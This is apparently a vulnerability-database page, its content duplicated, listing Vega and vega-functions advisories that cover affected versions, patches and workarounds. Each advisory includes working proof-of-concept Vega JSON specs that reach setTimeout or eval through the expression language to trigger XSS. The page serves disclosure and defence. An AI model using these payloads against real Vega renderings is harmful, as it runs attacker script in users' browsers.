Version Details and Security Vulnerabilities

Impact

In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported.

Patches

Patched in vega 5.31.0 / vega-functions 5.16.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

• Run vega without vega.expressionInterpreter. This mode is not the default as it is slower.
• Using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.

References

• Reported to Vega-Lite by @kprevas Nov 8 2024 in https://github.com/vega/vega-lite/issues/9469 & https://github.com/vega/vega/issues/3984

Reproduction of the error in Vega by @mattijn

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "signals": [
    {
      "name": "inject_alert",
      "on": [
        {
          "events": [
            {
              "type": "mousedown",
              "marktype": "rect",
              "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
            }
          ],
          "update": "datum"
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "rect",
      "encode": {
        "update": {
          "x": {"value": 0},
          "y": {"value": 0},
          "width": {"value": 100},
          "height": {"value": 100}
        }
      }
    }
  ]
}

Impact

Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.

Workarounds

• Use vega with expression interpreter
• Upgrade to a newer Vega version (5.32.0)

POC Summary

Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.

POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}

Impact

In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported.

Patches

Patched in vega 5.31.0 / vega-functions 5.16.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

• Run vega without vega.expressionInterpreter. This mode is not the default as it is slower.
• Using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.

References

• Reported to Vega-Lite by @kprevas Nov 8 2024 in https://github.com/vega/vega-lite/issues/9469 & https://github.com/vega/vega/issues/3984

Reproduction of the error in Vega by @mattijn

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "signals": [
    {
      "name": "inject_alert",
      "on": [
        {
          "events": [
            {
              "type": "mousedown",
              "marktype": "rect",
              "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
            }
          ],
          "update": "datum"
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "rect",
      "encode": {
        "update": {
          "x": {"value": 0},
          "y": {"value": 0},
          "width": {"value": 100},
          "height": {"value": 100}
        }
      }
    }
  ]
}

Impact

Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.

Workarounds

• Use vega with expression interpreter
• Upgrade to a newer Vega version (5.32.0)

POC Summary

Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.

POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}